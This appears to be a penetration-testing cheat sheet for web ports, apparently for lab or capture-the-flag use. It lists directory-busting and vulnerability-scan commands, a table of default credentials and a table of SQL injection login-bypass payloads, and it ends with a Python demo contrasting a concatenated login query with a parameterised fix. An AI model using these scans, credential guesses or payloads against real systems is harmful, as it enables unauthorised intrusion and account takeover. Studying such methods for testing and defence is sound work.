80/443 - HTTP(s)
First thing I would do:
Directory busting (dirb):
dirb http://<IP>/
Directory busting (gobuster):
gobuster dir -x php,txt,xml,asp,aspx --url http://<IP>/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -b 404 -f
Directory busting (ffuf):
ffuf -c -u http://<IP>/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
Vulnerability scan (nmap):
nmap <IP> -p80 --script vuln -Pn
Vulnerability scan (nikto):
nikto -host http://<IP>/
WordPress scan:
wpscan --url http://<IP>/
While the scans are running, try:
Try weak credentials and default logins, intercept the request in Burp and try a dictionary attack to crack the credentials, and try SQLi.
Check the source code for anything juicy.
If you see any CMS (Joomla, WordPress, Tomcat, etc.), visit my go-to website here
Sometimes you also find creds in the CMS's GitHub repo. Also look for config files and README files, which can reveal sensitive info.
If you find SQLi, then go here
If you find LFI/RFI, then go here
If you find file uploads, then go here
Note all the usernames and keywords; sometimes the cewl tool helps for cracking the password.
Find exploits by searching the keywords in the following manner: keyword poc, keyword GitHub, keyword htb, keyword hack the box
Default Creds Login Page

| User | Pass |
|---|---|
| admin | admin |
| admin | password |
| admin | 1234 |
| admin | 123456 |
| root | toor |
| test | test |
| guest | guest |
| anonymous | anonymous |
SQL Injection

| User | Pass |
|---|---|
| tom | tom |
| tom | ' or '1'='1 |
| tom | ' or 1='1 |
| tom | 1' or 1=1 -- - |
| ' or '1'='1 | ' or '1'='1 |
| ' or ' 1=1 | ' or ' 1=1 |
| 1' or 1=1 -- - | blah |
| whatever' or '1'='1 | whatever' or '1'='1 |
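To show why the payloads in the table above get past a login form, and what the fix on the application side looks like, here is an added example (not part of the original notes): a login check built by string concatenation beside the parameterised version, run against a constructed one-user table in Python's built-in sqlite3 module. The username, password and table layout are assumptions for the demo.

```python
import sqlite3

# Constructed demo user table; 'S3cretPass!' is a placeholder credential, not from any real system.
# Plaintext password storage is a simplification for the demo; real code stores a salted hash.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('tom', 'S3cretPass!')")
    conn.commit()
    return conn

def login_vulnerable(conn: sqlite3.Connection, user: str, pw: str) -> bool:
    # Builds the WHERE clause by string concatenation, so a quote in either field
    # changes the SQL itself; a tautology like ' or '1'='1 matches every row.
    query = (f"SELECT username FROM users "
             f"WHERE username = '{user}' AND password = '{pw}'")
    return conn.execute(query).fetchone() is not None

def login_fixed(conn: sqlite3.Connection, user: str, pw: str) -> bool:
    # Bound parameters: the driver passes user and pw as data, never as SQL,
    # so the same payloads are compared literally and do not match any row.
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (user, pw)).fetchone() is not None

def compare(user: str, pw: str) -> dict:
    # Returns what each implementation decides for one username/password pair.
    conn = make_db()
    return {"vulnerable": login_vulnerable(conn, user, pw),
            "fixed": login_fixed(conn, user, pw)}

if __name__ == "__main__":
    for user, pw in [("tom", "S3cretPass!"), ("tom", "' or '1'='1"),
                     ("tom", "1' or 1=1 -- -"), ("' or '1'='1", "' or '1'='1")]:
        print(repr(user), repr(pw), compare(user, pw))
```

The `' or 1='1` row from the table is left out of the run because SQLite compares the integer 1 and the text '1' as unequal, while MySQL treats them as equal; the concatenation bug is the same either way.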